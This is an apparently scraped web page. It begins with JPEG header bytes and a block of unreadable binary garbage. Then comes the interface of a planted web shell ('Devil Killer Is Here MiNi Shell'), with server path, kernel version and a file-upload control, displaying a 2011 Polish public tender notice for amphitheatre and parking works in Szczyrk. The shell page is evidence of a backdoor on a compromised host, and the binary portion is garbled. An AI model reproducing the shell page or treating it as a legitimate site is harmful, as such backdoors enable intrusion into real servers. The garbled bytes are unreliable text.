JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110406/67194-N-2011.html

<p class="kh_header"><b>Szczyrk: Zagospodarowania terenu wokół Amfiteatru wraz z parkingiem oraz budowa widowni Amfiteatru w Szczyrku</b><br>
<b>Numer ogłoszenia: 67194 - 2011; data zamieszczenia: 06.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Szczyrku , ul. Beskidzka 4, 43-370 Szczyrk, woj. śląskie, tel. 033 8295026, faks 033 8178763.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.szczyrk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowania terenu wokół Amfiteatru wraz z parkingiem oraz budowa widowni Amfiteatru w Szczyrku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. ZAGOSPODAROWANIE  TERENU
Na działce nr 1-1816-2 projektowany jest parking dla samochodów osobowych obsługujący samochody osób przyjeżdżających do amfiteatru. Zaprojektowane zostały 52 miejsca postojowe o wymiarach 2,5x5m, w tym 4 miejsca dla osób niepełnosprawnych
(3,6x5m). Z uwagi na sąsiedztwo w/w działki z działkami budowlanymi od wschodu  i południa - należy zachować odległość = 6m pomiędzy projektowanymi miejscami postojowymi, a granicami działki. Po stronie południowej zaprojektowano ulicę wewnętrzną parkingu w odległości ok.1m od granicy. Jest możliwe wykonanie dodatkowych 8 miejsc postojowych wzdłuż granicy wschodniej - dzięki uzyskaniu odstępstwa od warunków technicznych (dokumenty - w opracowaniu pt. Projekt budowlany - DOKUMENTY I UZGODNIENIA).
Parking obsługiwany będzie przez istniejące wjazdy od ul.Wypoczynkowej - przeznaczone do modernizacji. Modernizacja budynku jest integralną częścią projektu - zawarta została w odrębnym opracowaniu. Pozostałe działki wokół budynku amfiteatru zostały zaprojektowane jako przestrzenie otwarte o funkcji ekspozycyjnej, rekreacyjnej i komunikacyjnej. 
Zaprojektowana została widownia składająca się z trzech sektorów mieszcząca ok. 1000 osób na miejscach siedzących.
Teren zostanie ogrodzony:
- ogrodzenie główne obejmujące działki wokół amfiteatru oraz parking wraz z przyległą infrastrukturą,
- ogrodzenie wewnętrzne - oddzielające widownię i budynek amfiteatru od reszty terenu (odcinek ABCD na rysunku),

Ogrodzenie systemowe - na wzór ogrodzenia terenu przyległej skoczni, np. system Nylofor 3D.
Wzdłuż granicy z ul. Beskidzką i Wypoczynkową na odcinku 123 (oznaczone na projekcie zagospodarowania terenu) należy wykonać barierę drogową. Na odcinku 4567 należy wykonać niskie barierki uniemożliwiające przejazd samochodom i zabezpieczające przed upadkiem z wysokości. Istniejące ogrodzenie na odcinku 1, 9, 10 - należy wymienić.
Wzdłuż północnej granicy działki projektowanego parkingu (wzdłuż ul. Beskidzkiej) - skarpa zostanie umocniona murkiem oporowym z gazonów. Wzdłuż południowej granicy działki parkingu (wzdłuż działki sąsiada o nr 1817-14) skarpa zostanie umocniona murkiem oporowym z palisady betonowej.

Teren należy uzbroić w następujące media:
- energię elektryczną,
- wodę,
- kanalizację sanitarną,
- kanalizację deszczową,
- monitoring (wg odrębnego opracowania),

Do projektowanych na terenie stoisk wystawienniczych należy doprowadzić:
- kanalizację,
- wodę,
- energię elektryczną,

Cały teren zostanie oświetlony lampami stojącymi oraz kinkietami:
- np. lampa Moove Palo single version, h=350cm,
- np. lampa Moove Palo double version, h=350cm,
- np. kinkiety Moove IP65 - montowane na wysokości 320cm,
- oświetlenie liniowe w posadzce, np. lampa LEDIA LL OD, firmy Hess,
- lampy wysokie - reflektory - oświetlające w razie potrzeby cały plac za widownią oraz parking - np. lampa Squadra na słupach lub rónoważne.
Oświetlenie należy podzielić na sekcje umożliwiające oświetlenie poszczególnych części terenu w miarę potrzeb. Należy także pamiętać, że część oświetlenia będzie obsługiwała cały teren podczas dnia codziennego, a część tylko podczas imprez.

Przekładki gazociągów mają za zadanie umożliwienie prowadzenia drogowych robot budowlanych, umożliwienie wykonania przebudowy i budowy innego uzbrojenia podziemnego, usytuowanie przewodów gazowych  na odpowiednich głębokościach  pod powierzchnia projektowanych placów , jezdni i chodników zgodnie z obowiązującymi przepisami . 

2. OBIEKT BUDOWLANY - WIDOWNIA.
Widownia składa się z  trzech sektorów ustawionych osiowo względem sceny istniejącego amfiteatru. 
Pod sektorami zaprojektowane zostały pomieszczenia mieszczące :
- pod sektorami bocznymi  - pomieszczenia szatniowe wraz z zapleczem  socjalnym dla zespołów występujących w amfiteatrze, od strony zewnętrznej  - boksy  na stoiska wystawiennicze ,
- pod sektorem środkowym - toalety dla widzów amfiteatru, pomieszczenie pierwszej pomocy oraz pomieszczenia dodatkowe  dla obsługi technicznej, magazyny, od strony zewnętrznej ściana widowni  będzie wyposażona w telebim dla publiczności pozostającej poza wewnętrznym ogrodzeniem amfiteatru .
 
Podstawowe parametry techniczne obiektu:
pow. zabudowy widowni                                                    709m2  w tym:
- sektor A - 226,8m2
- sektor B - 241,1m2
- sektor C - 241,1m2
pow. użytkowa (przyziemia pod widownią)                       310,27m2 w tym:
- sektor A - 113,41m2
- sektor B - 98,43m2
- sektor C - 98,43m2
kubatura                                                                              1454,50m2 w tym:
- sektor A - 522,60m3
- sektor B - 466,10m3
- sektor C - 466,10m3
wysokość całkowita widowni                       < 12m - zgodnie z zapisem w planie
miejscowym
- sektor A - 7,8m
- sektor B - 5,9m
- sektor B - 5,9m

Zestawienie pomieszczeń:
sektor środkowy A                                                               - 113,41m2 :
1. korytarz                                                                                     6,40m2
2. pomieszczenie pierwszej pomocy                                           21,12m2
3. pomieszczenie dodatkowe                                                       15,57m2
4. magazyn                                                                                     9,86m2
5. magazyn                                                                                     7,19m2
6. korytarz                                                                                      4,50m2
7. przedsionek wc męskiego                                                           5,73m2
8. wc męski                                                                                   12,11m2
9. wc dla widzów niepełnosprawnych                                           4,40m2
10.przedsionek wc damskiego                                                        7,83m2
11.wc damski                                                                                12,28m2
12.pomieszczenie porządkowe                                                       1,95m2
13.pomieszczenie gospodarcze                                                       4,42m2
sektor boczny B                                                                      - 98,43m2 :
1. korytarz                                                                                     21,19m2
2. szatnia artystów                                                                        28,69m2
3. wc męski                                                                                     8,48m2
4. wc damski 							        8,48m2
5. pomieszczenie porządkowe 				        1,20m2
6. szatnia artystów 						       30,39m2
sektor boczny C                                                                       - 98,43m2 :
1. korytarz 							      21,19m2
2. szatnia artystów 						      28,69m2
3. wc męski 							        8,48m2
4. wc damski 							        8,48m2
5. pomieszczenie porządkowe 				       1,20m2
6. szatnia artystów                                                                         30,39m2

Projektowany obiekt ma kształt nawiązujący bezpośrednio do kształtu sceny istniejącego amfiteatru. Stanowi część ogrodzenia wewnętrznego (odcinek ABCDE) oddzielającego widownię i amfiteatr od terenów wystawienniczo-rekreacyjnych. Na jego tylnych ścianach zaprojektowane zostały żelbetowe donice, w których posadzone zostaną drzewa (gatunki występujące na terenach górzystych), których zadaniem będzie:
- dodatkowe oddzielenie górnego pasa widowni od przestrzeni placu położonego poniżej (zabezpieczenie przed ewentualnym rzucaniem przedmiotami przez osoby stojące na widowni),
- wytworzenie pewnego rodzaju kurtyny dźwiękochłonnej,
- stworzenie przyjaznego klimatu podgórskiej miejscowości (inspiracją są drzewa rosnące na skalnych półkach w górach),

Rozwiązania konstrukcyjne:
- fundamenty - ławy i słupy żelbetowe,zbrojone zgodnie z projektem
- ściany zewnętrzne: pustak poryzowany Porotherm szer.25cm, ocieplony styropianem szer.15cm,
- ściany wewnętrzne nośne: pustak poryzowany Porotherm szer.25cm,
- ściany wewnętrzne działowe- pustak poryzowany Porotherm szer.11,5cm, 8cm, oraz  z gazobetonu szer.6 cm,
- ścianki systemowe w wc damskim - np. system VK13 firmy FCS sp. z o.o.,
- schody - żelbetowe monolityczne i stalowe,
- słupy - żelbetowe monolityczne zgodnie z projektem,
- dach - konstrukcja drewniana,

a) Wyposażenie budowlano-instalacyjne:
Projektowana widownia będzie podłączona do następujących sieci zewnętrzne.:
- wodociągowej,
- energetycznej,
- kanalizacji sanitarnej,
- kanalizacji deszczowej,
- teletechnicznej,
- odgromowej,
Do pomieszczeń usytuowanych pod widownią należy doprowadzić następujące instalacje:
- instalację wodną,
- instalację kanalizacji sanitarnej,
- instalację elektryczną oświetleniowa i gniazd wtykowych,
- instalację niskonapięciowa (np. głośniki),
- instalację sygnalizacji przeciwpożarowej,
Do projektowanych stoisk wystawienniczych należy doprowadzić następujące instalacje:
- instalację wodną,
- instalację kanalizacji sanitarnej,
- instalację elektryczną oświetleniowa i gniazd wtykowych,
b) Instalacja  ziemnej  i ciepłej wody użytkowej
Budynek widowni amfiteatru składa się z trzech segmentów A,B i C w oparciu  o projekt budowlany oraz rozwiązania funkcjonalne doprowadzenie wody zimnej do poszczególnych sektorów nastąpi  z istniejącej sieci wodociągowej. Po doprowadzeniu przyłączy do budynku zainstalowane zostaną zawory odcinające.
Instalacja wodociągowa w obiekcie zostanie wykonana:
a)instalacja wody zimnej - rury wielowarstwowe np. BOR-STABI o średnicy dn. 16-25 mm,
b)instalacja wody ciepłej i cyrkulacji przewidziano zastosowanie rur wielowarstwowych  PE-Xc-A1.-PE w zakresie średnic dn 16 - dn 25mm w technologii j.w. na PN 10,0bar łączone na kształtki, w izolacji zimnochronnej oraz ciepłochronnej z pianki oliuretanowej. Maksymalne ciśnienie robocze w instalacji wynosi 1,0 MPa.
c) Przygotowanie ciepłej wody użytkowej
Woda ciepła dla odbiorników zostanie przygotowana  przez:
- zabudowanie podgrzewacza elektrycznego o poj. 60l z grzałką elektryczną Ne =2,0 kW
- lokalnych podgrzewaczy elektrycznych przepływowych o mocy 5,7 kW

d) Trasy rurociągów instalacji wodociągowych, izolacje, mocowanie 
Odcinki poziome przewodów prowadzić w przestrzeni stropu podwieszonego, pionowe, zejścia po ścianach lub w bruzdach ściennych. Przewody wody zimnej prowadzić  w izolacji zimnochronnej, natomiast instalacja cwu i cyrkulacji w izolacji termicznej  o gr. 9-20 mm. Przewody prowadzone w stropie podwieszonym mocować do konstrukcji wsporczych pomocniczych  lub na zawiesiach do stropu .
e) Kanalizacja sanitarna.
Na kanalizację przewiduje się rury PCV łączone na uszczelki gumowe.
Piony kanalizacyjne prowadzić w bruzdach ściennych lub w obudowie płyt gipsowych.
Piony wyposażone zostaną w rewizje oraz rury wywiewne wyprowadzone powyżej konstrukcji dachu widowni.
Projektowane piony kanalizacyjne włączyć do kolektora sanitarnego prowadzonego pod posadzką na wprowadzeniu zabudować trójniki włączeniowe PVC.
Rurociągi prowadzić ze spadkami minimalnymi:
1. O100 mm     - i = 2%
2. O 150 mm    -i = 1,5%
3. O 200mm     -i = 1%
Wszystkie ścieki sanitarne z budynku odprowadzone zostaną do kanalizacji zewnętrznej miejskiej. 
W przypadku montażu urządzeń klimatyzacyjnych, skropliny należy odprowadzić grawitacyjnie do kanalizacji sanitarnej poprzez zamknięcia wodne. Piony i poziomy kanalizacyjne na odcinku zewnętrznym winne zostać zaizolowane termicznie.
f) Instalacja CO, wentylacji mechaniczne oraz bilans ciepła.
Ogrzewanie budynku i wentylacja mechaniczna ogrzewanie pomieszczeń

W oparciu o wykonany bilans ciepła budynku, zapotrzebowanie ciepła wynosi:
- strata ciepła dla sektora A amfiteatru :                         6972 W
- strata ciepła dla sektora B amfiteatru :                         7426 W
- strata ciepła dla sektora C amfiteatru :                         8473 W
 - projektowane cieplne obciążenie budynku                 22871 W

W oparciu o przeprowadzone ustalenia projektuje się ogrzewanie przyziemia budynku widowni przy pomocy grzejników elektrycznych. Proponuje się grzejniki konwekcyjne F18 1000 W o parametrach i charakterystyce technicznej:
- moc grzewcza grzejnika: 1000 W
- 5-funkcyjny przełącznik trybów pracy,
- elektroniczny termostat cyfrowy
- możliwość sterowania
- 3 zakresy temperatury pracy, (komfort 10-280C; EKO; antyzamarzanie 7°C), 
- montaż naścienny
- wymiary: 450 x 445 x 78 mm
Proponowana lokalizacja grzejników wg części rysunkowej projektu. 

WENTYLACJA
1. Dla węzłów sanitarnych przewidziano wentylację mechaniczną na bazie wentylatorów kanałowych typ TD-160- 100 oraz TD-250- 100 o parametrach:
- wydajność maksymalna V=150-250 m3-h
- moc elektryczna silnika wentylatora: 35,39 W
- napięcie: 230 V
Montaż wentylatora na kanale wentylacyjnym wywiewnym zblokować z oświetleniem. Do rozprowadzenia powietrza zaprojektowano sieć przewodów wentylacyjnych montowanych w strefie sufitu podwieszonego. Poza sufitem podwieszanym przewody wentylacyjne montowane będą bezpośrednio pod stropem. Na instalację wentylacji wywiewnej przewiduję się zastosowanie:
- w strefie sufitu podwieszonego, kanały elastyczne w izolacji,
- poza sufitem podwieszanym, kanały z blachy stalowej ocynkowanej SPIRO. 

Jako elementy wywiewne zastosowane zostaną kołowe dyfuzory wywiewne np. typ VEF -100.
2. Dla pozostałych pomieszczeń tj. szatnie artystów, pomieszczenia dodatkowe, pierwszej pomocy projektuje się wentylację nawiewno-wywiewną w ilości 1,5 w-h, nie mniej niż 20 m3-h-osobę.

NAWIEW
Do nawiewu proponuje się zastosowanie aparatu grzewczo-wentylacyjnego typ NEOLUX  IIII o parametrach:
-  moc grzałek elektrycznych : 2,0 kW
- trzy biegi wentylatora,
- maksymalna ilość powietrza nawiewanego: 357 m3-h
- moc silnika wentylatora: 77 W
- wymiary gabarytowe: 828 x 647 x 203 mm
- masa: 28 kg
Doprowadzenie świeżego powietrza przez kanał szczelinowy zaizolowany, zabudowany bezpośrednio przy ścianie.
Czerpnią ścienna zabudowana na wysokości ~2,3 m od posadzki.
Wlot powietrza przez szczelinę zabezpieczoną siatką nierdzewną o oczkach 5 x 5 mm.
W niektórych pomieszczeniach zastosowano automat nawiewny ZLA160 samoczynny regulowany temperaturowo o wydajności V=100 m3-h. Automat montować w ścianie zewnętrznej na wysokości -2,3 m od posadzki.

WYWIEW
Dla w/w pomieszczeń przewidziano wentylację mechaniczną wywiewną na bazie wentylatorów kanałowych typ TD-250-100 o parametrach:
- wydajność maksymalna V=250 m3-h
- moc elektryczna silnika wentylatora: 39 W (przewiduje się zastosowanie falownika)
- napięcie: 230 V
Montaż wentylatora na kanale wentylacyjnym wywiewnym.
Do rozprowadzenia powietrza zaprojektowano sieć przewodów wentylacyjnych w strefie sufitu podwieszonego oraz przewody okrągłe typu SPIRO bezpośrednio pod stropem. Wszystkie przewody podlegają odpowiedniej izolacji. Do wywiewu przewiduje się zastosowanie: kołowe dyfuzory wywiewne typ VEF -100

g) Charakterystyka energetyczna budynku:
Projektowany budynek  ma zapewnioną dostawę energii elektrycznej o mocy przyłączeniowej - 22kW. Do wykonania ochrona przeciwporażeniowa, instalacja oświetlenia pomieszczeń, instalacja gniazd i gniazd siłowych.

3. MODERNIZACJA BUDYNKU  MAGAZYNOWEGO 
Opis stanu istniejącego budynku magazynowego:
- ściany wykonane z pustaków betonowych, tynkowane i malowane,
- strop - płyta żelbetowa,
- dach jednospadowy, kryty papą i częściowo blachą trapezową - nad częścią niższą,
- dach dwuspadowy, kryty papą - nad częścią wyższą,
- istniejąca instalacja: wodna, kanalizacja, ogrzewanie, i elektryczność,

W ramach modernizacji projektowane jest:
- wyburzenie części dobudowanych podczas poprzednich lat użytkowania
zaznaczone za projekcie zagospodarowania terenu oraz rys. nr 2.,
- wyburzenie ścianek działowych,
- zamurowanie przejść między pomieszczeniami,
- likwidacja stropodachu żelbetowego nad częścią niższą,
- nowa konstrukcja dachu nad częścią niższą - projektowany jest dach dwuspadowy, kryty blachą trapezową,
- w razie konieczności wymiany płyt g-k istniejącego sufity w części wyższej (decyzja Inwestora) należy docieplić dach poprzez ułożenie warstwy 10cm wełny mineralnej i paroizolacji na ruszcie systemowym,
- podczas prac związanych ze zmianą pokrycia dachu nad częścią wyższą , należy zwrócić uwagę na stan techniczny istniejącej więźby i elementy zniszczone- niewidoczne podczas inwentaryzacji, należy wymienić,
- wymiana pokrycia dachu nad częścią wyższą - na blachę trapezową,
- zamurowanie otworów okiennych na elewacji tylnej ( w granicy działki),
- likwidacja otworów okiennych na elewacji frontowej,
- wykonanie otworów drzwiowych w elewacji frontowej - szerokie, dwuskrzydłowe drzwi z przeszkleniami w części górnej,
- likwidacja istniejących sanitariatów,
- ocieplenie budynku,
- tynkowanie i malowanie elewacji oraz wykonanie okładziny drewnianej,
- wykonanie orynnowania i obróbek blacharskich,
- remont wnętrza - skucie tynków istniejących, wykonanie koniecznych napraw, nowych tynków oraz malowanie, układanie płytek ceramicznych na ścianach,
- wykonanie nowej instalacji oświetleniowej i gniazd wtykowych,
- wykonanie wentylacji grawitacyjnej - rury spiro wyprowadzone ponad dach jako kominki wentylacyjne,
- zasypanie istniejących kanałów do naprawy samochodów,
- oczyszczenie istniejącej posadzki z gruzu i elementów ruchomych, wykonanie warstwy wyrównawczej podłogi i ułożenie płytek gresowych antypoślizgowych,

Po modernizacji budynek będzie podzielony na cztery części. Do każdej będą prowadziły drzwi dwuskrzydłowe z przeszkleniami. Pośrodku wykonane zostaną drzwi jednoskrzydłowe prowadzące do projektowanego pomieszczenia gospodarczego. Poprzez zmianę konstrukcji dachu i wysokości budynek uzyska odpowiednie proporcje i tym samych podniesie swoje walory estetyczne.

Podstawowe parametry techniczne obiektu:
     istniejąca: 		       po modernizacji:
powierzchnia zabudowy                                        310m2                                293,60m2
powierzchnia użytkowa                                         245,14m2                           246,73m2
kubatura                                                                  1132,70m2                         1161,40m2
wysokość całkowita                                        od 3,1 do 5,5m                     od 2,9 do 5,6m

Zestawienie pomieszczeń:
1. magazyn 						57,67m2
2. magazyn 						46,90m2
3. pom. gospodarcze 					7,66m2
4. magazyn 						42,40m2
5. magazyn 						92,10m2
RAZEM: 						245,73m2

a) Forma i funkcja obiektu budowlanego:
Modernizowany obiekt nadal zachowa swoją dotychczasową funkcję budynku magazynowego.
Będzie jednak służył jako zaplecze magazynowe dla amfiteatru i widowni, bez możliwości wynajmowania powierzchni osobom indywidualnym czy instytucjom zewnętrznym. Budynek nie jest przewidziany do stałego pobytu ludzi - nie przewiduje się instalacji ogrzewania pomieszczeń na stałe - jedynie w razie konieczności urządzenia grzewcze będą podłączane do instalacji elektrycznej.
Elewacje budynku zostaną uporządkowane, zastosowane materiały i kolorystyka będą dostosowane do projektowanej widowni amfiteatru.
b)  Rozwiązania konstrukcyjne:
- fundamenty - istniejące,
- ściany zewnętrzne - istniejące,
- ściany wewnętrzne nośne - istniejące,
- ściany wewnętrzne działowe- płyty gipsowo-kartonowe na stelażu systemowym z wypełnieniem wełną mineralną gr. 12cm,
- dach - konstrukcja drewniana, wiązary co 90cm,

Wyposażenie budowlano-instalacyjne:
Modernizowany budynek będzie podłączony do następujących sieci zewn.:
- energetycznej,
- kanalizacji deszczowej,
- odgromowej,

Do pomieszczeń należy doprowadzić następujące instalacje:
- instalację elektryczną oświetleniową i gniazd wtykowych, umożliwiająca podłączenie  w razie konieczności urządzeń grzewczych.

4. BRANŻA DROGOWA 
Istniejący teren parkingu, który zlokalizowany jest bezpośrednio przy ul. Wypoczynkowej posiada nawierzchnie bitumiczną w złym stanie technicznym  częściowo okrawężnikowaną. 
	Odwodnienie terenu parkingu odbywa się poprzez nadanie spadków podłużnych  i poprzecznych, a następnie  odprowadzane jest do kanalizacji deszczowej.

Plac amfiteatru posiada nawierzchnię z kostki betonowej typu trylinka okrawężnikowany. Teren placu amfiteatru jest w ogólnym złym stanie technicznym, braki w nawierzchni oraz liczne zapadnięcia tworzące kałuże .

a) Forma architektoniczna i funkcja  
- na przebudowywanym istniejącym parkingu przy ul. Wypoczynkowej przewidziano nawierzchnię asfaltową. Obsługa komunikacyjna parkingu będzie odbywała się poprzez istniejące zjazdy z ul. Wypoczynkowej.
- opaskę wykonano   z krawężników betonowych ulicznych 15x30cm  ustawionych na ławach betonowych z oporem  z betonem C 12-15,
- miejsca postojowe pod kątem 900 w liczbie 56 szt. o szer. 250 cm i dł. 500 cm  oraz miejsc postojowych  dla osób niepełnosprawnych  w liczbie 4 szt. o szer. 360cm i dł. 500cm.
- celem odsunięcia miejsc postojowych od elewacji istniejącego budynku gospodarczego, zaprojektowano opaskę z krawężników betonowych o wymiarach 15x30cm ustawionych na ławach betonowych z oporem  z betonu C 12-15,
- warstwa ścieralna na terenie amfiteatru  została wykonana z kostki  betonowej, warstwy podbudowy zostały zaprojektowane  zgodnie  wymaganiami inwestora  obciążenie dla ruchu KR2 i klasy drogi L- lokalnej,
- nawierzchnia ul. Wypoczynkowej po wykonaniu infrastruktury technicznej będzie wykonana z nawierzchni bitumicznej . 
5. KANALIZACJA DESZCZOWA
Dla  przyjętych rozwiązań drogowych zaprojektowano odwonienie nawierzchni utwardzonych: projektowanego parkingu oraz utwardzonego terenu wokół amfiteatru ciągami kanalizacji deszczowej zlokalizowanymi na terenie parkingu,  ul. Wypoczynkowej  oraz na terenie amfiteatru. Kanalizacje należy  wykonać w oparciu załączoną dokumentacje do  aneksu do opinii GK.SD.7442-929-2009(ZUDP).

6.PRZEBUDOWA SIECI NN, ZASILANIE PAWILONÓW  WYSTAWIENNICZYCH  I OŚWIETLENIA  TERENU. 
Zakłada się rozbiórkę trzech odc. sieci energetycznej napowietrznej nN. Ze słupów S1  i  S2  przewidziano zasilanie stoisk wystawienniczych.

a) Zasilanie stoisk wystawienniczych 
Nowe stoiska wystawiennicze zasilane będą ze słupów S1 i S2 poprzez projektowane
złącza pomiarowe ZKP1 i ZKP2 oraz zestawy pomiarowo rozdzielcze ZPR1-.....-ZPR9 (układy zapomiarowe). Zasilanie przewidziano kablem typu YAKY 4x35mm2. Szczegółowy schemat zasilania stoisk przedstawiony został na rysunku nr E-3. Pomiar energii elektrycznej zaprojektowano w układzie bezpośrednim licznikami energii czynnej 3-fazowymi, które zlokalizowano w projektowanych złączach ZKP1 i ZKP2. Dodatkowo w projekcie przewidziano również po jednym układzie pomiarowym (podliczniki) na każde stoisko wystawiennicze.
Moc przewidziana dla zasilania poszczególnych układów pomiarowych jest taka sama jak moc przyłączeniowa istniejących punktów pomiarowo - rozdzielczych zloklaizowanych na terenie placu wokół amfiteatru.

b) Przebudowa przyłącza teletechnicznego
Na przeznaczonym do rozbiórki słupie sieci nN podwieszone jest przyłącze teletechniczne do budynku przy ul. Beskidzkiej 2A. Istniejące przyłącze podwiesić należy pod istniejącymi przewodami sieci napowietrznej nN oraz pod przyłączem napowietrznym do budynku z wykorzystaniem jako podpora słupa oznaczonego na planie S2.

c)  Oświetlenie terenu
Oświetlenie przewidziane jest dla terenu wokół amfiteatru, parkingu oraz ulicy Wypoczynkowej. Sieć oświetlenia wykonana zostanie jako kablowa niezależna od sieci energetyki zawodowej. Zasilanie oświetlenia zrealizowane będzie z obwodów instalacji rozdzielczej pomieszczeń pod widownią oraz magazynu przy parkingu.
- Słupy i oprawy oświetleniowe
